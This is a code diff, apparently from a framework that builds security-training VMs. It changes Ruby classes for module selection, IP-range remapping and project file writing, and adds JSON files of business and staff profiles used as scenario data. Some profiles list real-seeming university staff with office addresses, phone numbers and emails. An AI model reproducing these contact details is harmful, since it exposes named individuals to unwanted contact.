redcarpet_toc = Redcarpet::Markdown.new(Redcarpet::Render::HTML_TOC.new())
self.html_TOC_rendered = redcarpet_toc.render(lab_sheet_markdown).force_encoding('UTF-8')
html_template_out = ERB.new(File.read(self.html_template_path), 0, '<>-')
html_out = html_template_out.result(self.get_binding)
json = {'xml_config' => xml_config.force_encoding('UTF-8'), 'html_lab_sheet' => html_out.force_encoding('UTF-8')}.to_json.force_encoding('UTF-8')
self.outputs << json.to_s
end
# Returns binding for erb files (access to variables in this classes scope)
# @return binding
def get_binding
binding
end
end

View File

@@ -104,7 +104,17 @@ class StringEncoder
Print.local_verbose "Encoding '#{encoding_print_string}'"
encode_all
Print.local_verbose "Encoded: #{self.outputs.to_s}"
# print the first 700 chars to screen
output = self.outputs.to_s
length = output.length
if length < 1000
Print.local_verbose "Encoded: #{output}..."
else
Print.local_verbose "Encoded: #{output.to_s[0..1000]}..."
Print.local_verbose "(Displaying 1000/#{length} length output)"
end
puts has_base64_inputs ? base64_encode_outputs : self.outputs
end

View File

@@ -87,7 +87,17 @@ class StringGenerator
Print.local_verbose "Generating..."
generate
Print.local_verbose "Generated: #{self.outputs.to_s}"
# print the first 1000 chars to screen
output = self.outputs.to_s
length = output.length
if length < 1000
Print.local_verbose "Generated: #{output}..."
else
Print.local_verbose "Generated: #{output.to_s[0..1000]}..."
Print.local_verbose "(Displaying 1000/#{length} length output)"
end
puts has_base64_inputs ? base64_encode_outputs : self.outputs
end

View File

@@ -8,7 +8,7 @@ class System
attr_accessor :module_selectors # (filters)
attr_accessor :module_selections # (after resolution)
attr_accessor :num_actioned_module_conflicts
attr_accessor :system_networks
attr_accessor :options #(command line options hash)
# Initalizes System object
# @param [Object] name of the system
@@ -20,14 +20,66 @@ class System
self.module_selectors = module_selectors
self.module_selections = []
self.num_actioned_module_conflicts = 0
self.system_networks = []
end
# selects from the available modules, based on the selection filters that have been specified
# @param [Object] available_modules all available modules (vulnerabilities, services, bases)
# @param [Object] options command line options hash
# @return [Object] the list of selected modules
def resolve_module_selection(available_modules)
def resolve_module_selection(available_modules, options)
retry_count = 0
# Replace $IP_addresses with options ip_ranges if required
begin
if options[:ip_ranges] and $datastore['IP_addresses'] and !$datastore['replaced_ranges']
unused_opts_ranges = options[:ip_ranges].clone
option_range_map = {} # k = ds_range, v = opts_range
new_ip_addresses = []
# Iterate over the DS IPs
$datastore['IP_addresses'].each do |ds_ip_address|
# Split the IP into ['X.X.X', 'Y']
split_ip = ds_ip_address.split('.')
ds_ip_array = [split_ip[0..2].join('.'), split_ip[3]]
ds_range = ds_ip_array[0] + '.0'
# Check if we have encountered first 3 octets before i.e. look in option_range_map for key(ds_range)
if option_range_map.has_key? ds_range
# if we have, grab that value (opts_range)
opts_range = option_range_map[ds_range]
# replace first 3 in ds_ip with first 3 in opts_range
split_opts_range = opts_range.split('.')
split_opts_range[3] = ds_ip_array[1]
new_ds_ip = split_opts_range.join('.')
# save in $datastore['IP_addresses']
new_ip_addresses << new_ds_ip
else #(if we haven't seen the first 3 octets before)
# grab the first range that we haven't used yet from unused_opts_ranges with .shift (also removes the range)
opts_range = unused_opts_ranges.shift
# store the range mapping in option_range_map (ds_range => opts_range)
option_range_map[ds_range] = opts_range
# split the opts_range and replace last octet with last octet of ds_ip_address
split_opts_range = opts_range.split('.')
split_opts_range[3] = ds_ip_array[1]
new_ds_ip = split_opts_range.join('.')
# save in $datastore['IP_addresses']
new_ip_addresses << new_ds_ip
end
end
$datastore['IP_addresses'] = new_ip_addresses
$datastore['replaced_ranges'] = true
end
rescue NoMethodError
required_ranges = []
$datastore['IP_addresses'].each { |ip_address|
split_range = ip_address.split('.')
split_range[3] = 0
required_ranges << split_range.join('.')
}
required_ranges.uniq!
Print.err("Fatal: Not enough ranges were provided with --network-ranges. Provided: #{options[:ip_ranges].size} Required: #{required_ranges.uniq.size}")
exit
end
begin
selected_modules = []
@@ -249,7 +301,14 @@ class System
end
end
# execute calculation script and format output to an array of Base64 strings
outputs = `ruby #{selected.local_calc_file} #{args_string}`.chomp
command = "ruby #{selected.local_calc_file} #{args_string}"
Print.verbose "Running: #{command}"
outputs = `#{command}`.chomp
unless $?.success?
Print.err "Module failed to run (#{command})"
# TODO: this works, but subsequent attempts at resolving the scenario always fail ("Error can't add no data...")
raise 'failed'
end
output_array = outputs.split("\n")
selected.output = output_array.map { |o| Base64.strict_decode64 o }
end
@@ -319,7 +378,7 @@ class System
if /^.*defaultinput/ =~ def_unique_id
def_unique_id = def_unique_id.gsub(/^.*defaultinput/, selected.unique_id)
end
default_modules_to_add.concat select_modules(module_to_add.module_type, module_to_add.attributes, available_modules, previously_selected_modules + default_modules_to_add, def_unique_id, module_to_add.write_output_variable, def_write_to, module_to_add.received_inputs, module_to_add.default_inputs_literals, module_to_add.write_to_datastore, module_to_add.received_datastores, module_to_add.write_module_path_to_datastore)
end
end
@@ -378,14 +437,4 @@ class System
modules_to_add
end
def get_networks
if (self.system_networks = []) # assign the networks
self.module_selections.each do |mod|
if mod.module_type == 'network'
self.system_networks << mod
end
end
end
self.system_networks
end
end

View File

@@ -34,11 +34,26 @@ class ProjectFilesCreator
# Generate all relevant files for the project
def write_files
# when writing to a project that already contains a project, move everything out the way,
# and keep the Vagrant config, so that existing VMs can be re-provisioned/updated
if File.exists? "#{@out_dir}/Vagrantfile" or File.exists? "#{@out_dir}/puppet"
dest_dir = "#{@out_dir}/MOVED_#{Time.new.strftime("%Y%m%d_%H%M")}"
Print.warn "Project already built to this directory -- moving last build to: #{dest_dir}"
Dir.glob( "#{@out_dir}/**/*" ).select { |f| File.file?( f ) }.each do |f|
dest = "#{dest_dir}/#{f}"
FileUtils.mkdir_p( File.dirname( dest ) )
if f =~ /\.vagrant/
FileUtils.cp( f, dest )
else
FileUtils.mv( f, dest )
end
end
end
FileUtils.mkpath "#{@out_dir}" unless File.exists?("#{@out_dir}")
FileUtils.mkpath "#{@out_dir}/puppet/" unless File.exists?("#{@out_dir}/puppet/")
FileUtils.mkpath "#{@out_dir}/environments/production/" unless File.exists?("#{@out_dir}/environments/production/")
threads = []
# for each system, create a puppet modules directory using librarian-puppet
@systems.each do |system|
@currently_processing_system = system # for template access
@@ -108,11 +123,11 @@ class ProjectFilesCreator
end
# Create the marker xml file
x2file = "#{@out_dir}/marker.xml"
x2file = "#{@out_dir}/flag_hints.xml"
xml_marker_generator = XmlMarkerGenerator.new(@systems, @scenario, @time)
xml = xml_marker_generator.output
Print.std "Creating marker file: #{x2file}"
Print.std "Creating flags and hints file: #{x2file}"
begin
File.open(x2file, 'w+') do |file|
file.write(xml)
@@ -121,6 +136,7 @@ class ProjectFilesCreator
Print.err "Error writing file: #{e.message}"
exit
end
Print.std "VM(s) can be built using 'vagrant up' in #{@out_dir}"
end
@@ -130,20 +146,28 @@ class ProjectFilesCreator
template_out = ERB.new(File.read(template), 0, '<>-')
begin
File.open(filename, 'w+') do |file|
File.open(filename, 'wb+') do |file|
file.write(template_out.result(self.get_binding))
end
rescue StandardError => e
Print.err "Error writing file: #{e.message}"
exit
Print.err e.backtrace.inspect
end
end
# Resolves the network based on the scenario and ip_range.
def resolve_network(scenario_ip_range)
# In the case that both command-line --network-ranges and datastores are provided, we have already handled the replacement of the ranges in the datastore.
# Because of this we prioritise datastore['IP_address'], then command line options (i.e. when no datastore is used, but the --network-ranges are passed), then the default network module's IP range.
def resolve_network(network_module)
current_network = network_module
scenario_ip_range = network_module.attributes['range'].first
# Prioritise datastore IP_address
if current_network.received_inputs.include? 'IP_address'
ip_address = current_network.received_inputs['IP_address'].first
elsif @options.has_key? :ip_ranges
# if we have options[:ip_ranges] we want to use those instead of the ip_range argument.
# Store the mappings of scenario_ip_ranges => @options[:ip_range] in @option_range_map
if @options.has_key? :ip_ranges
# Have we seen this scenario_ip_range before? If so, use the value we've assigned
if @option_range_map.has_key? scenario_ip_range
ip_range = @option_range_map[scenario_ip_range]
@@ -154,10 +178,14 @@ class ProjectFilesCreator
@option_range_map[scenario_ip_range] = options_ips.first
ip_range = options_ips.first
end
ip_address = get_ip_from_range(ip_range)
else
ip_range = scenario_ip_range
ip_address = get_ip_from_range(scenario_ip_range)
end
ip_address
end
def get_ip_from_range(ip_range)
# increment @scenario_networks{ip_range=>counter}
@scenario_networks[ip_range] += 1

View File

@@ -0,0 +1,47 @@
{
"business_name": "Artisan Bakery",
"business_motto": "The loaves are in the oven.",
"business_address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"domain": "artisan-bakery.co.uk",
"office_telephone": "0113 222 1080",
"office_email": "orders@artisan-bakery.co.uk",
"industry": "Bakers",
"manager": {
"name": "Maxie Durgan",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "maxie@artisan-bakery.co.uk",
"username": "maxie",
"password": ""
},
"employees": [
{
"name": "Matthew Riley",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "matt@artisan-bakery.co.uk",
"username": "matt",
"password": ""
},
{
"name": "Emelie Lowe",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "emelie@artisan-bakery.co.uk",
"username": "emelie",
"password": ""
},
{
"name": "Antonio Durgan",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "antonio@artisan-bakery.co.uk",
"username": "antonio",
"password": ""
}
],
"product_name": "Baked goods",
"intro_paragraph": [
"Finest bakery in Headingley since 1900. Baked fresh daily. Bread loaves, teacakes, sweet and savoury treats. We are open from 9 am til 6 pm, every day except for bank holidays."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "Northern Banking",
"business_motto": "We'll keep your money safe!",
"business_address": "123 The Headrow, Leeds, LS1 5RD",
"domain": "northernbanking.co.uk",
"office_telephone": "0113 000 0123",
"office_email": "enquiries@northernbanking.co.uk",
"industry": "Finance",
"manager": {
"name": "Heather Schmidt",
"address": "800 Bogisich Avenue, Oswaldohaven, Leeds, LS9 6NB",
"phone_number": "07836 581948",
"email_address": "h.schmidt@northernbanking.co.uk",
"username": "h_schmidt",
"password": ""
},
"employees": [
{
"name": "Zion Jacobson",
"address": "104 Cole Square, ",
"phone_number": "07880 057670",
"email_address": "z.jacobson@northernbanking.co.uk",
"username": "z_jacobson",
"password": ""
},
{
"name": "Jonathan Ray",
"address": "644 Jackson Path, Leeds, LS2 4AJ",
"phone_number": "07893 001623",
"email_address": "j.ray@northernbanking.co.uk",
"username": "j_ray",
"password": ""
},
{
"name": "Virginia Sullivan",
"address": "23 Jane Street, Harrogate, HG1 4DJ",
"phone_number": "07826 576277",
"email_address": "v.sullivan@northernbanking.co.uk",
"username": "v_sullivan",
"password": ""
}
],
"product_name": "Financial Services",
"intro_paragraph": [
"About Northern Bank","With roots back to its establishment in Huddersfield, West Yorkshire in 1805. Northern bank has a strong personal customer base and business banking capability though a UK-wide network. Northern Bank is a trading name of Big Bank PLC."
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "The Yorkshire Fitness Company",
"business_motto": "Get thi sen down't gym!",
"business_address": "15 Sheepscar Court, Leeds LS7 2BB",
"domain": "yorkshirefitco.co.uk",
"office_telephone": "0113 026 9999",
"office_email": "office@yorkshirefitco.co.uk",
"industry": "Health and Fitness",
"manager": {
"name": "Jerry Rivera",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "0113 026 9999",
"email_address": "jerry.rivera@yorkshirefitco.co.uk",
"username": "jerry_rivera",
"password": ""
},
"employees": [
{
"name": "Immanuel Bahringer IV",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "07688 112479",
"email_address": "immanuel.bahringer.iv@yorkshirefitco.co.uk",
"username": "immanuel_bahringer_iv",
"password": ""
},
{
"name": "Anne Hunter",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "07791 179177",
"email_address": "anne.hunter@yorkshirefitco.co.uk",
"username": "anne_hunter",
"password": ""
},
{
"name": "Katelin Langworth",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "07550 561978",
"email_address": "katelin.langworth@yorkshirefitco.co.uk",
"username": "katelin_langworth",
"password": ""
}
],
"product_name": "",
"intro_paragraph": [
"Experience Yorkshire's leading health and fitness club in the not far from the city centre. Established in 1990 The Yorkshire Fitness Company is committed to getting you the results you want.",
"If you like classes, the gym or a combo of both, our dedicated professional team of coaches & teachers are always available to motivate you and guide you towards your goals."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "Abacus Technology Solutions",
"business_motto": "Solving your problems so you don't have to.",
"business_address": "Unit 12, Lincoln St, Huddersfield HD1 6RX",
"domain": "abacus-technology.co.uk",
"office_telephone": "01484 850963",
"office_email": "office@abacus-technology.co.uk",
"industry": "IT Services",
"manager": {
"name": "Ellie Bosco",
"address": "Office 1, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "07528 347828",
"email_address": "e.bosco@abacus-technology.co.uk",
"username": "ebosco",
"password": ""
},
"employees": [
{
"name": "Keara Harris",
"address": "Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "07674 358645",
"email_address": "k.harris@abacus-technology.co.uk",
"username": "kharris",
"password": ""
},
{
"name": "Janessa Rempel",
"address": "Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "07644 118595",
"email_address": "j.rempel@abacus-technology.co.uk",
"username": "jrempel",
"password": ""
},
{
"name": "Russell Ramirez",
"address": "Office 3, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "01484 850963",
"email_address": "r.ramirez@abacus-technology.co.uk",
"username": "rramirez",
"password": ""
}
],
"product_name": "IT Solutions",
"intro_paragraph": [
"Providers of cloud services, backups, data recovery, hardware, off-the-shelf and bespoke software. 24/7 technical support available. Custom design and installation based on your companies needs!"
]
}

View File

@@ -0,0 +1,9 @@
{"business_name":"Artisan Bakery","business_motto":"The loaves are in the oven.","business_address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","domain":"artisan-bakery.co.uk","office_telephone":"0113 222 1080","office_email":"orders@artisan-bakery.co.uk","industry":"Bakers","manager":{"name":"Maxie Durgan","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07645 289149","email_address":"maxie@artisan-bakery.co.uk","username":"maxie","password":""},"employees":[{"name":"Matthew Riley","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07876 518651","email_address":"matt@artisan-bakery.co.uk","username":"matt","password":""},{"name":"Emelie Lowe","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07560 246931","email_address":"emelie@artisan-bakery.co.uk","username":"emelie","password":""},{"name":"Antonio Durgan","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07943 250930","email_address":"antonio@artisan-bakery.co.uk","username":"antonio","password":""}],"product_name":"Baked goods","intro_paragraph":["Finest bakery in Headingley since 1900. Baked fresh daily. Bread loaves, teacakes, sweet and savoury treats. We are open from 9 am til 6 pm, every day except for bank holidays."]}
{"business_name":"Northern Banking","business_motto":"We'll keep your money safe!","business_address":"123 The Headrow, Leeds, LS1 5RD","domain":"northernbanking.co.uk","office_telephone":"0113 000 0123","office_email":"enquiries@northernbanking.co.uk","industry":"Finance","manager":{"name":"Heather Schmidt","address":"800 Bogisich Avenue, Oswaldohaven, Leeds, LS9 6NB","phone_number":"07836 581948","email_address":"h.schmidt@northernbanking.co.uk","username":"h_schmidt","password":""},"employees":[{"name":"Zion Jacobson","address":"104 Cole Square, ","phone_number":"07880 057670","email_address":"z.jacobson@northernbanking.co.uk","username":"z_jacobson","password":""},{"name":"Jonathan Ray","address":"644 Jackson Path, Leeds, LS2 4AJ","phone_number":"07893 001623","email_address":"j.ray@northernbanking.co.uk","username":"j_ray","password":""},{"name":"Virginia Sullivan","address":"23 Jane Street, Harrogate, HG1 4DJ","phone_number":"07826 576277","email_address":"v.sullivan@northernbanking.co.uk","username":"v_sullivan","password":""}],"product_name":"Financial Services","intro_paragraph":["About Northern Bank","With roots back to its establishment in Huddersfield, West Yorkshire in 1805. Northern bank has a strong personal customer base and business banking capability though a UK-wide network. Northern Bank is a trading name of Big Bank PLC."]}
{"business_name":"Yorkshire Fitness Company","business_motto":"Get thi sen down't gym!","business_address":"15 Sheepscar Court, Leeds LS7 2BB","domain":"yorkshirefitco.co.uk","office_telephone":"0113 026 9999","office_email":"office@yorkshirefitco.co.uk","industry":"Health and Fitness","manager":{"name":"Jerry Rivera","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"0113 026 9999","email_address":"jerry.rivera@yorkshirefitco.co.uk","username":"jerry_rivera","password":""},"employees":[{"name":"Immanuel Bahringer IV","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"07688 112479","email_address":"immanuel.bahringer.iv@yorkshirefitco.co.uk","username":"immanuel_bahringer_iv","password":""},{"name":"Anne Hunter","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"07791 179177","email_address":"anne.hunter@yorkshirefitco.co.uk","username":"anne_hunter","password":""},{"name":"Katelin Langworth","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"07550 561978","email_address":"katelin.langworth@yorkshirefitco.co.uk","username":"katelin_langworth","password":""}],"product_name":"","intro_paragraph":["Experience Yorkshire's leading health and fitness club in the not far from the city centre. Established in 1990 The Yorkshire Fitness Company is committed to getting you the results you want.","If you like classes, the gym or a combo of both, our dedicated professional team of coaches & teachers are always available to motivate you and guide you towards your goals."]}
{"business_name":"Abacus Technology Solutions","business_motto":"Solving your problems so you don't have to.","business_address":"Unit 12, Lincoln St, Huddersfield HD1 6RX","domain":"abacus-technology.co.uk","office_telephone":"01484 850963","office_email":"office@abacus-technology.co.uk","industry":"IT Services","manager":{"name":"Ellie Bosco","address":"Office 1, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"07528 347828","email_address":"e.bosco@abacus-technology.co.uk","username":"ebosco","password":""},"employees":[{"name":"Keara Harris","address":"Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"07674 358645","email_address":"k.harris@abacus-technology.co.uk","username":"kharris","password":""},{"name":"Janessa Rempel","address":"Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"07644 118595","email_address":"j.rempel@abacus-technology.co.uk","username":"jrempel","password":""},{"name":"Russell Ramirez","address":"Office 3, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"01484 850963","email_address":"r.ramirez@abacus-technology.co.uk","username":"rramirez","password":""}],"product_name":"IT Solutions","intro_paragraph":["Providers of cloud services, backups, data recovery, hardware, off-the-shelf and bespoke software. 24/7 technical support available. Custom design and installation based on your companies needs!"]}
{"business_name":"Leeds Beckett","business_motto":"Computer Forensics and Security","business_address":"43 Church Wood Ave, Leeds LS16 5LF","domain":"leedsbeckett.ac.uk","office_telephone":"0113 81 23000","office_email":"study@leedsbeckett.ac.uk","industry":"Higher Education","manager":{"name":"Emlyn Butterfield","address":"115, Caedmon Hall, Headingley Campus","phone_number":"0113 81 24440","email_address":"E.Butterfield@leedsbeckett.ac.uk","username":"ebutterfield","password":""},"employees":[{"name":"Dr. Z. Cliffe Schreuders","address":"105, Caedmon Hall, Headingley Campus","phone_number":"0113 81 28608","email_address":"C.Schreuders@leedsbeckett.ac.uk","username":"zschreuders","password":""},{"name":"Dr. Maurice Calvert","address":"117, Caedmon, Headingley Campus","phone_number":"0113 81 27429","email_address":"M.Calvert@leedsbeckett.ac.uk","username":"mcalvert","password":""},{"name":"Dr. John Elliott","address":"108, Caedmon, Headingley Campus","phone_number":"0113 81 27379","email_address":"J.Elliott@leedsbeckett.ac.uk","username":"jelliott","password":""}],"product_name":"University Education","intro_paragraph":["Computer forensics involves the analysis of digital devices such as hard drives to identify and investigate their contents. Computer security involves using knowledge of computer systems and networks to protect businesses and users from malicious attacks.","This course combines these two fields of national importance and will teach you practical investigative and 'hacking' techniques. You will develop the skills to undertake rigorous forensic analysis and implement robust security mechanisms.","This is a hands-on course where you will learn through doing, gaining an in-depth knowledge of how to hack a computer to be able to protect it. You will learn where a computer hides data and how to recover information from a device."]}
{"business_name":"Leeds Beckett","business_motto":"Leeds Law School","business_address":"City Campus, Leeds LS1 3HE","domain":"leedsbeckett.ac.uk","office_telephone":"0113 81 23000","office_email":"study@leedsbeckett.ac.uk","industry":"Higher Education","manager":{"name":"Deveral Capps","address":"306, Portland Building, City Campus","phone_number":"0113 81 26085","email_address":"d.capps@leedsbeckett.ac.uk","username":"d_capps","password":""},"employees":[{"name":"Dr. Simon Hale-Ross","address":"306, Portland Building, City Campus","phone_number":"0113 8129526","email_address":"S.Haleross@leedsbeckett.ac.uk","username":"s_haleross","password":""},{"name":"Professor Simon Gardiner","address":"204, Rose Bowl, City Campus","phone_number":"0113 81 26414","email_address":"S.Gardiner@leedsbeckett.ac.uk","username":"s_gardiner","password":""},{"name":"Dr. Jessica Guth","address":"306, Portland Building, City Campus","phone_number":"0113 81 26403","email_address":"J.Guth@leedsbeckett.ac.uk","username":"j_guth","password":""}],"product_name":"University Education","intro_paragraph":["Our Law School sits in the heart of the great city of Leeds, the most important legal centre outside London and home to over 180 law firms employing in excess of 8,000 professionals. It is perfectly placed to ensure all our undergraduate, postgraduate, full and part-time students are able to mine the wealth of practical experience and employment opportunities available on our doorstep.","With state-of-the-art facilities, mentoring and career development opportunities, placements and a courtroom, students who choose Leeds Law School can expect a successful career founded on high calibre, practical teaching. We offer a broad variety of courses including our LLB, LLM Legal Practice (incorporating the LPC), LLM Qualifying Law Degree (incorporating the GDL) and LLM International Business Law, and each aims to give our graduates the enthusiasm, sharpness of mind and practical tools to thrive in competitive and fast-paced professional environments."]}
{"business_name":"Leeds Beckett","business_motto":"Music and Performing Arts","business_address":"43 Church Wood Ave, Leeds LS16 5LF","domain":"leedsbeckett.ac.uk","office_telephone":"0113 81 23000","office_email":"study@leedsbeckett.ac.uk","industry":"Higher Education","manager":{"name":"Dr Richard Stevens","address":"209, Caedmon, Headingley Campus","phone_number":"0113 81 23690","email_address":"R.C.Stevens@leedsbeckett.ac.uk","username":"r_stevens","password":""},"employees":[{"name":"Dr. Laura Griffiths","address":"Reception, Priestley Hall, Headingley Campus","phone_number":"n/a","email_address":"Laura.Griffiths@leedsbeckett.ac.uk","username":"l_griffiths","password":""},{"name":"Carl Flattery","address":"104, Caedmon, Headingley Campus","phone_number":"0113 81 27372","email_address":"C.Flattery@leedsbeckett.ac.uk","username":"c_flattery","password":""},{"name":"Sam Nicholls","address":"212, Caedmon, Headingley Campus","phone_number":"0113 81 23726","email_address":"S.Nicholls@leedsbeckett.ac.uk","username":"s_nicholls","password":""}],"product_name":"University Education","intro_paragraph":["The School of Film, Music & Performing Arts fosters a culture of creation and participation. We are proud shapers of, and contributors to, the cultural life of this great Northern city a city that is the original birthplace of film. We nurture the arts pioneers of the future: influencers who will not just reflect the outside world, but impact upon it."]}
{"business_name":"Yorkshire Personal Health","business_motto":"We'll have you as good as new in no time.","business_address":"159 Longlands St, Bradford BD1 2PX","domain":"yorkspersonalhealth.co.uk","office_telephone":"01274 200700","office_email":"info@yorkspersonalhealth.co.uk","industry":"Medical Services","manager":{"name":"Angela Dickinson","address":"76103 Joshuah Path, Port Magali, Cambridgeshire, R1 1TR","phone_number":"01274 200700 ext 100","email_address":"a.dickinson@yorkspersonalhealth.co.uk","username":"dickinson_a","password":""},"employees":[{"name":"Abdullah Carroll","address":"Office A, 160 Longlands St, Bradford BD1 2PX","phone_number":"01274 200700 ext 101","email_address":"a.carroll@yorkspersonalhealth.co.uk","username":"carroll_a","password":""},{"name":"Annie Williamson","address":"Office B, 160 Longlands St, Bradford BD1 2PX","phone_number":"01274 200700 ext 103","email_address":"a.williamson@yorkspersonalhealth.co.uk","username":"williamson_a","password":""},{"name":"Jammie Marks","address":"Office B, 160 Longlands St, Bradford BD1 2PX","phone_number":"01274 200700 ext 110","email_address":"j.marks@yorkspersonalhealth.co.uk","username":"marks_j","password":""}],"product_name":"Check up","intro_paragraph":["A health assessment is more than a check up. It can be the start of a journey towards better health.","We use our health expertise to build a clear picture of where your current health is and identify potential future health risks. After your health assessment, well give you guidance and support to help you become healthier today and in the future."]}
{"business_name":"Speedy Pizzas","business_motto":"Pizza done quick.","business_address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","domain":"speedypizzas.co.uk","office_telephone":"0113 123 3214","office_email":"info@speedypizzas.co.uk","industry":"Food","manager":{"name":"David Sand","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07879 635412","email_address":"dave@speedypizzas.co.uk","username":"d_sand","password":""},"employees":[{"name":"Cydney Hermann","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"0113 123 3214","email_address":"cydney@speedypizzas.co.uk","username":"c_hermann","password":""},{"name":"Lori Marshall","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"0113 123 3214","email_address":"lori@speedypizzas.co.uk","username":"l_marshall","password":""},{"name":"Andrea Martinez","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"0113 123 3214","email_address":"andrea@speedypizzas.co.uk","username":"a_martinez","password":""}],"product_name":"Pizza","intro_paragraph":["Welcome to speedy pizzas. Piping hot food either in store or delivered to your door. Pizza takeaway, parmesan, kebabs and much more.","We are based in the centre of Headingley on Headingley lane and will deliver up to 3 miles for free, 1 quid per additional mile. Red hot pizza on delivery or your money back."]}

View File

@@ -0,0 +1,49 @@
{
"business_name": "Leeds Beckett- Computer Forensics and Security",
"business_motto": "",
"business_address": "43 Church Wood Ave, Leeds LS16 5LF",
"domain": "leedsbeckett.ac.uk",
"office_telephone": "0113 81 23000",
"office_email": "study@leedsbeckett.ac.uk",
"industry": "Higher Education",
"manager": {
"name": "Emlyn Butterfield",
"address": "115, Caedmon Hall, Headingley Campus",
"phone_number": "0113 81 24440",
"email_address": "E.Butterfield@leedsbeckett.ac.uk",
"username": "ebutterfield",
"password": ""
},
"employees": [
{
"name": "Dr. Z. Cliffe Schreuders",
"address": "105, Caedmon Hall, Headingley Campus",
"phone_number": "0113 81 28608",
"email_address": "C.Schreuders@leedsbeckett.ac.uk",
"username": "zschreuders",
"password": ""
},
{
"name": "Dr. Maurice Calvert",
"address": "117, Caedmon, Headingley Campus",
"phone_number": "0113 81 27429",
"email_address": "M.Calvert@leedsbeckett.ac.uk",
"username": "mcalvert",
"password": ""
},
{
"name": "Dr. John Elliott",
"address": "108, Caedmon, Headingley Campus",
"phone_number": "0113 81 27379",
"email_address": "J.Elliott@leedsbeckett.ac.uk",
"username": "jelliott",
"password": ""
}
],
"product_name": "University Education",
"intro_paragraph": [
"Computer forensics involves the analysis of digital devices such as hard drives to identify and investigate their contents. Computer security involves using knowledge of computer systems and networks to protect businesses and users from malicious attacks.",
"This course combines these two fields of national importance and will teach you practical investigative and 'hacking' techniques. You will develop the skills to undertake rigorous forensic analysis and implement robust security mechanisms.",
"This is a hands-on course where you will learn through doing, gaining an in-depth knowledge of how to hack a computer to be able to protect it. You will learn where a computer hides data and how to recover information from a device."
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "Leeds Beckett- Leeds Law School",
"business_motto": "",
"business_address": "City Campus, Leeds LS1 3HE",
"domain": "leedsbeckett.ac.uk",
"office_telephone": "0113 81 23000",
"office_email": "study@leedsbeckett.ac.uk",
"industry": "Higher Education",
"manager": {
"name": "Deveral Capps",
"address": "306, Portland Building, City Campus",
"phone_number": "0113 81 26085",
"email_address": "d.capps@leedsbeckett.ac.uk",
"username": "d_capps",
"password": ""
},
"employees": [
{
"name": "Dr. Simon Hale-Ross",
"address": "306, Portland Building, City Campus",
"phone_number": "0113 8129526",
"email_address": "S.Haleross@leedsbeckett.ac.uk",
"username": "s_haleross",
"password": ""
},
{
"name": "Professor Simon Gardiner",
"address": "204, Rose Bowl, City Campus",
"phone_number": "0113 81 26414",
"email_address": "S.Gardiner@leedsbeckett.ac.uk",
"username": "s_gardiner",
"password": ""
},
{
"name": "Dr. Jessica Guth",
"address": "306, Portland Building, City Campus",
"phone_number": "0113 81 26403",
"email_address": "J.Guth@leedsbeckett.ac.uk",
"username": "j_guth",
"password": ""
}
],
"product_name": "University Education",
"intro_paragraph": [
"Our Law School sits in the heart of the great city of Leeds, the most important legal centre outside London and home to over 180 law firms employing in excess of 8,000 professionals. It is perfectly placed to ensure all our undergraduate, postgraduate, full and part-time students are able to mine the wealth of practical experience and employment opportunities available on our doorstep.",
"With state-of-the-art facilities, mentoring and career development opportunities, placements and a courtroom, students who choose Leeds Law School can expect a successful career founded on high calibre, practical teaching. We offer a broad variety of courses including our LLB, LLM Legal Practice (incorporating the LPC), LLM Qualifying Law Degree (incorporating the GDL) and LLM International Business Law, and each aims to give our graduates the enthusiasm, sharpness of mind and practical tools to thrive in competitive and fast-paced professional environments."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "Leeds Beckett- Music and Performing Arts",
"business_motto": "",
"business_address": "43 Church Wood Ave, Leeds LS16 5LF",
"domain": "leedsbeckett.ac.uk",
"office_telephone": "0113 81 23000",
"office_email": "study@leedsbeckett.ac.uk",
"industry": "Higher Education",
"manager": {
"name": "Dr Richard Stevens",
"address": "209, Caedmon, Headingley Campus",
"phone_number": "0113 81 23690",
"email_address": "R.C.Stevens@leedsbeckett.ac.uk",
"username": "r_stevens",
"password": ""
},
"employees": [
{
"name": "Dr. Laura Griffiths",
"address": "Reception, Priestley Hall, Headingley Campus",
"phone_number": "n/a",
"email_address": "Laura.Griffiths@leedsbeckett.ac.uk",
"username": "l_griffiths",
